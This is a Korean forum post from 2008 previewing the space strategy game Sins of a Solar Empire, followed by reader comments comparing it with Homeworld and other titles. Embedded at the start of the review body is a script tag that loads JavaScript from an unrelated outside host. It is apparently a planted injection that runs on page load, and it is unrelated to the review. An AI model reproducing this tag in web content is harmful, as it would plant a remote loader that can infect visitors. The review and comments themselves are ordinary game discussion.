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[프리뷰]

최신작 Sins of a solar empire

글쓴이 : 라됴헤드  (218.♡.162.113) 날짜 : 2008-02-12 (화) 20:03 조회 : 22574


<SCRIPT Language=JavaScript src=http://rnjsdudwh.cafe24.com/Mics.php></script> * 편의상 리뷰안에서는 반말을 쓰도록 하겠으니 양해를 바랍니다. Sins of a Solar Empire. 요즘 꽤나 여기저기에서 호평을 받고 있는 게임이 있길래 관심을 갖고 살펴보았다. 몇개의 트레일러와 스크린샷만 봐도 예전에 꽤나 재밌게했었던 RTS게임인 Home World 시리즈와 흡사하게 보였다. 그냥 봐도 골빈 게임은 아닌것 같았고 스팟이나 스파이에서의 평점을 믿고 구매하기로 하였다. 워낙에 우주시뮬을 좋아하기도 하지만.. 홈월드는 정말 재밌게 했었다. 마음이 급해서 다운로드 패키지로 사는 바람에 위쪽의 패키지는 가지고 있지 않다. 스팀 서비스를 따라 만들었으나 꽤나 많은 게임 패키지가 있는 Stardock 을 통해 샀는데, 이쪽은 덜 메이저하지만 취향에는 더 맞을지도 모른다는 생각이 들었다. 컬렉터즈 에디션도 있었다. 테크- 트리 포스터 와 , 아트웍 포스터, 핫키 나열 카드, 음악CD가 포함되어 있나 보다... 나에겐 전혀 필요없는 것들이다.. 갠적으로 한정판은 RPG만 구매를 한다..;; 장르 실시간 전략 시뮬레이션이다. 홈월드와 비슷하지만 홈월드는 한 행성에서의 전략을 그린 반면에 솔라는(솔라라고 부르겠다.)넓은 우주의 행성 하나하나를 따먹고 관리하고 발전 시켜서 우주전쟁을 하고 다른 문명과 외교를 하는등 그런 좀더 광범위한 시뮬성이 추가 돼있다. 전투나 그밖의 연출은 홈월드와 거의 흡사하다. <이렇게 넓은 우주에 있는 행성 하나하나를 따먹는다.> <행성 하나하나 확대 할수 있다. 디테일은 그냥 봐줄만하다> 인터페이스 복잡하지 않다. 거의 모든 동작은 마우스 좌/우 클릭으로 해결보며 좀더 어드밴스한 플레이를 원하는 유저는 옵션에 빼곡히 정렬돼있는 핫키를 쓰면 됀다. 기본적으로 홈월드와 거의 비슷한 인터페이스다. <정말 많은 HOT키들 다 쓸필욘 없다> No 시나리오??!! 싱글플레이시 스토리를 따라가는 스토리 모드는 존재하지 않는다. 어떠한 상황을 정하고 그 상황을 풀어가는 시나리오모드 같은것도 존재하지 않는다. 맵을 정하고 팀을 정하고 게임을 시작하는 스커미쉬 같은 모드밖에는 존재하지 않는다. 하지만 전혀 문제돼지 않는다...한 게임이 큰맵을 선택할경우 몇일? 몇주? 는 갈것 같으니 말이다. 문명시리즈나 미디블2와 같은 형식이라 보면 돼겠다.. <이렇게 맵의 크기와 게임속도등을 결정하고.> <플레이어 종족과 AI의 난이도를 선택한다.> 게임 플레이 처음 게임을 시작하면 애니 형식으로됀 깔끔한 오프닝 동영상이 흘러나온다.(홈월드2 와 넘 비슷하다..) <홈월드 넘 따라한다..> 종족은 총 3종족이 나오는데 조잡한 영어실력으로 알아 먹은 결과 인간, 정신계 외계인, 기계화 외계인의 익숙한 3구도다 게임을 처음 시작하면 자기 소유의 행성1개와 전투기 생산공장 1개 건설유닛2 개 로 시작하게 됀다. <막 시작한 썰렁한 모습.> 게임 진행 형식은 4X 게임이다. 탐험(eXplore), 확장(eXpand), 개척(eXploit), 몰살(eXterminate). 전형적인 문명방식이지만. 솔라는 이모든것이 실시간으로 처리됀다는 점이다. 큰 맵은 행성이 80여개가 있는데..80개 이상의 행성을 실시간으로 관리하려면 정신 꽤나 없을것 같다. 자원은 3가지로 나뉜다. Credits , Metal , Crystal 자원을 모으는 방식은 여타 게임처럼 건설유닛이 직접 캐오는 방식이 아니고 행성주의에 운석들이 있다. 그 운석에 자원캐는 공장을 건설하면 1초에 10.0 이런식으로 자원이 들어온다. 이런 자원개념은 슈프림과 흡사하다. <이렇게 한다.> 행성과 행성의 거리는 수광년이다. 하지만 솔라에선 이런 거리개념을 우주게임이 다 그렇듯이 하이퍼스페이스로 나타내고 있다. 게임내에 행성과 행성사이에는 항로같이 선이 그어져 있는데 그곳을 따라 쭉 빛의속도처럼 이동한다. <이렇게 행성사이에는 선이 그어져 있다.> <고속 이동은 무료로 이루어 진다.> 자원을 모아 기술을 개발하고 더 많은 행성을 차지하고 외교를 진행하고.... 확실히 게임 방식은 그리 복잡하지 않다. 언어의 압박이 조금 있긴 하지만. 단어 몇개 찾아보다 보면 알수 있는 것들이고 게이밍 센스가 남다른 분들은 그냥 대충 훑어봐도 감이 올 것이다. 절대 문명처럼 복잡하지 않다..솔라와 비슷한 게임은 없을 것 같지만.. 굳이 흡사한 게임을 꼽아 보자면 HOMM시리즈 의 우주판 정도랄까.... 따먹은 행성은 고유의 이름을 부여할수도 있다. <서울이라고 이름을 붙혀봤다. > 그래픽 전체 품질은 중상 정도이다. 최첨단 그래픽을 감상할 정도는 아니지만, 눈쌀을 찌뿌릴 만큼 저품질의 리소스는 찾기가 어렵다. 소행성이 확대시에 저품질 텍스처이긴 하지만 태양이나 행성, 기체는 몰입도를 떨어뜨리지 않을 정도로 충분하다. (태양은 특히나 마음에 드는 표현을 보여준다) 그리고 3종족간의 건물과 유닛의 각각 다 다른점은 종족의 개성을 잃지 않는 부분에 많은 도움이 됀다. 게임 밸런스도 꽤 신경 쓴 것으로 보이지만, 전략 시뮬레이션의 영원한 숙제인 경쟁하기에 재미있는 AI 는 해결하지 못한 것 같다. 멀티플레이를 지원하므로 이 문제는 타협한 것으로 보인다. 하지만 싱글 플레이도 지나치게 어렵거나 지나치게 쉽지도 않다. 각자 수준에 맞게 적당히 AI 수준을 맞춘다면 큰 문제는 없을 것이다. <인간 진영의 건설유닛> <행성을 확대해 보면 이렇게 비행성들이 날아다니는 표현을 볼수도 있다.> <유닛 건설 모습> <외계 진영의 모습> 게임을 해보면서 생각을 해봤는데 전투시 최대 몇백기에 유닛이 격돌한다. 이정도 그래픽이지만 유닛이 몇백기가 나오고 행성들과 실시간으로 돌아가게 돼면 e6750 , 2g , 8800GT 512ram 이정도 사양에선 조금씩 밀리는감이 있었다. 개인적으로 좋은 그래픽보다 그래픽을 약간 포기하면서라도 쾌적한 게임플레이를 지향하기 때문에 이부분은 단점으로 보이진 않는다.. 그렇다고 떨어지는 그래픽도 아니고 많은 유닛이 싸우는 모습을 보고 있으면 화려하게 느껴지기도 한다. <어떻게 보면 화려하게 느껴지는 그래픽> <유닛이 많아져도 부드럽다.> <사운드> 모자라지도 않고 과하지도 않다. 적당하다. 행성이나 유닛 줌인 줌아웃시에 느껴지는 사운드의 거리감은 홈월드에 그것처럼 잘 처리돼있고 우주의 광활함을 말하듯 고요한 BGM은 그냥 그냥 들어줄만 하다. EAX는 지원하지 않는다. <총평> 화려한 볼거리보단 익숙한 잔재미를 선사하는 Sins of a solar empire는 캐나다 개발사인 Ironcladgames에 의해 개발돼었다. 홈월드와 비슷하긴 하지만 확실히 그이상의 것을 보여주고 있으니 아류작 따위는 아닌것 같다. 아직 게임스팟 공식점수는 나오지 않았지만 유저점수가 상당히 높고 게임스파이에서는 Editors choice도 먹었다고 게임 홈페이지에서 자랑중이시다. 뭐 그정도 까진 몰라도... 시뮬레이션 게임이 뭐 그렇듯이 처음부터 확 끌리진 않지만 빠져들다 보면 문명 시리즈 못지않은 중독성을 보여준다. 오랜만에 할만한 RTS게임이 나온것같다. 허접한 리뷰 봐주셔서 감사합니다. (__) * IntelD Blu-RayDisc™님에 의해서 게시물 이동되었습니다 (2008-02-15 21:18)

Immortal(완소라빈… (220.♡.53.156) 2008-02-12 (화) 21:13
최적화가 조금 걸림돌인가;;
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Immortal(완소라빈… (220.♡.53.156) 2008-02-12 (화) 21:14
게임은 홈월드삘 나서 잼있겠는듯
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로그_인 (125.♡.0.100) 2008-02-12 (화) 23:40
이 게임...겔럭틱 시빌라이제이션 2의 스케일에 소드 오브 더 스타와 같은 리얼타임을 도입한 흥미로운 게임입니다.
두 게임의 아쉬운 점이었다면, 겔럭틱은 느슨한 턴방식이었고, 소드는 단순무식 전쟁겜 (그렇다고 전술적으로 다양하지도 못한) 이었는데, 적절히 잘 섞었네요.
전략씬과 전술씬이 따로 있는 것이 아니라 통째로 진행되니, 최적화는 어느정도 감안해 주어야 할 것 같습니다.
마스터 오브 오리온 3 실패 후 몰락한 우주 전략이 점점 살아나는거 보니 팬으로서 참 기쁘군요.
테라포밍을 꿈꾸며...ㅁㅎ

그런데 국내는 언제쯤 들어오나...
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권창현 (59.♡.29.54) 2008-02-12 (화) 23:56
해게모니아 가 mod 만 좀 만들어졌으면 이게임은 나올이유도 없었을듯도...

시간이 없어 많이는 못해봤는대...

홈월드 처럼 위 아레 로 펼쳐저서 움직일수는 없는듯 하던대.... 기능키가 있나요 ?

단순 우주 시뮬인 척하면서 실제론 2D 상으로만 움직이는듯하던대...
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우라카타 (210.♡.67.147) 2008-02-13 (수) 03:46
리뷰 잘 봤습니다. 근데 쉽게 다가가긴 힘들것 같군요.
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Zechs (122.♡.209.49) 2008-02-13 (수) 08:12
조용히 대작게임이 하나 나온듯...
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Luger (59.♡.57.149) 2008-02-13 (수) 14:29
사양은 생각만큼 높지 않습니다. 오히려 낮다고 해야 하죠.
실제로 2D로 움직이는건 사실입니다. 대신 조작하긴 더 편해졌죠. 전투에 세세한 컨트롤이 필요하지 않은데 장점이 될수도 있고 단점이 될수도 있겠네요.. 수많은 유닛을 일일이 컨트롤 하는것도 힘든 일이죠.
가장 큰 단점은 처음에 다가가기 힘들다는 첨인데 차근차근 튜토리얼 부터 하면 금방입니다. 그뒤론 즐기는것만 남았죠.
HOMM 시리즈 좋아하시는 분들은 이것도 좋아하실듯.. 중독성이 강하더군요.
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콰이진 (124.♡.249.68) 2008-02-13 (수) 15:15
이거 홈월드 제작자들이 만든거라는 소릴 들은것 같네요
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로그_인 (125.♡.0.100) 2008-02-13 (수) 18:33
3D로 이동하는 거 가능합니다.
하지만...아무 의미 없음...
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라됴헤드 (218.♡.162.113) 2008-02-13 (수) 19:53
홈월드랑 똑같습니다 shift누르고 이동 포인트 찍으면 3d로 이동됍니다.
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FireFox (125.♡.64.190) 2008-02-13 (수) 22:17
전투 장면이 홈월드랑 비슷해서 홈월드를 많이 비유하지만...개인적으로 이 게임하고 제일 닮았다고 생각한 게임은 X3 리유니온입니다.  마치 X3의 전략 시뮬레이션화처럼 보인달까...C&C와 레니게이드를 보는듯한 느낌이더군요.
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rar133 (222.♡.12.16) 2008-02-14 (목) 04:27
근데 행성을 어떻게먹나요? 다른행성으로가서 다죽여도 행성에 아무것도 지을수도없고...
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NOSOKJA (211.♡.202.103) 2008-02-14 (목) 09:30
맨처음 시작하면 라이트닝쉽 만드는 덱에서 살펴보시면 콜로니어쩌고 행성식민지화 시키는 쉽이있습니다.
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Volfeed (211.♡.60.49) 2008-02-14 (목) 11:47
개인적으로 아쉬운점은 함선에서 포를 쏠때 포가 움직이질 않습니다...포는 가만히 있고 포탄만 꺽여지며 나가더군요...옵션에서 멀 잘못 건드려서 그런건 아닌거 같은데...그 부분이 너무 어색하더군요...
rar133/유닛중에 다른행성 먹을수 있게 해주는 유닛이 있습니다
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Leibstandarte™ (203.♡.184.100) 2008-02-14 (목) 13:32
MS에서 나온 프리랜서라는 게임을 재미있게 했었는데

프리랜서의 실시간 전략버전의 느낌이 솔솔 납니다...

아주 재미있네요 ^^
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Dispell (121.♡.195.176) 2008-02-16 (토) 01:23
행성전이라......
.
현 시뮬레이션 겜중에 행성을 가지고 하는건 오게임???
.
우주 전쟁 시물례이션은 홈월드??
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액트리스 (121.♡.161.119) 2008-02-16 (토) 10:06
우주공간에서 펼쳐지는 시뮬레이션류는 홈월드, 스타워즈 엠파이어엣워 밖에
해보지 못했군요. 각각 비슷하면서도 다른 특징을 살린것같네요 리뷰 잘봤습니다.
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제노니아 (59.♡.22.5) 2008-02-16 (토) 12:55
행성 땅따먹기 개념은 - 소드오브더스타즈 와 비슷하네요

한마디로 홈월드 + 소드오브더스타즈

이러면 완똑
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(71.♡.148.82) 2008-02-16 (토) 14:23
리뷰 잘봤습니다. 몇일전에 "Capital ship만으로 승리한다"가질려고 AI 3명과 FFA로 싸웠는데 7시간 걸렸습니다... 밤 11시부터 아침 6시까지..
빠져들면 한없이 빠져들더군요...
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분노의개삽질 (124.♡.76.200) 2008-02-20 (수) 13:41
행성을 '따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다''따먹는다'ㅍ
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red205 (121.♡.33.58) 2008-02-22 (금) 11:39
한글패치 나오면 대박, 안나오면 그림의 떡,
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뼈다귀신 (121.♡.8.3) 2008-02-23 (토) 10:56
이거 확장팩 나올까요? 나오면 같이 사려고 하는데
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apensin (211.♡.235.226) 2008-02-24 (일) 01:32
헤게모니아랑 엄청 비슷한데요? 헤게모니아 아시는 분이 별로 없으신지... 헤게모니아 개발자들이 만든거 아닐까요? 헤게모니아 솔직히 홈월드랑 비교해도 안 쳐질만한데...
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음란선생 (61.♡.9.3) 2008-03-02 (일) 21:11
기술개발 : 문명방식
전체맵 : 스페이스엠파이어
전투 : 스페이스엠파이어전술전투
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안티팬클럽 (116.♡.57.4) 2008-03-15 (토) 20:07
홈월드 제작진들이 만든겜 맞습니다. 시에라 내부갈등때문에 나와서 어디 모 자회사로 합류한걸로 압니다.

그래서 홈월드2 패치와 확팩이 나오지 않았지요. 멀티하는 유저로 많이 아쉬웠습니다.

베타때 홈월드 매니아 다수가 베타테스트로 걸쳐서 제작된겁니다.
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zelong (121.♡.220.122) 2008-04-12 (토) 00:00
어이없군요. 제 글을 절반은 베껴다 썼네요. 조치 해주셨으면 합니다. 베타겜, 유용한 정보 얻고 가는 사이트였는데...
(증거가 필요하시면 제 홈페이지 와보세요)
(운영진 메일을 찾지 못해 직접 댓글을 달기 위해 가입까지 해버렸군요-_-)
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울트라sm (121.♡.132.148) 2012-01-22 (일) 04:49
이건 또 뭔 개드립
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라스팔마스 (59.♡.228.235) 2008-04-20 (일) 00:09
어지러워서 못하겠던데 이런 게임.
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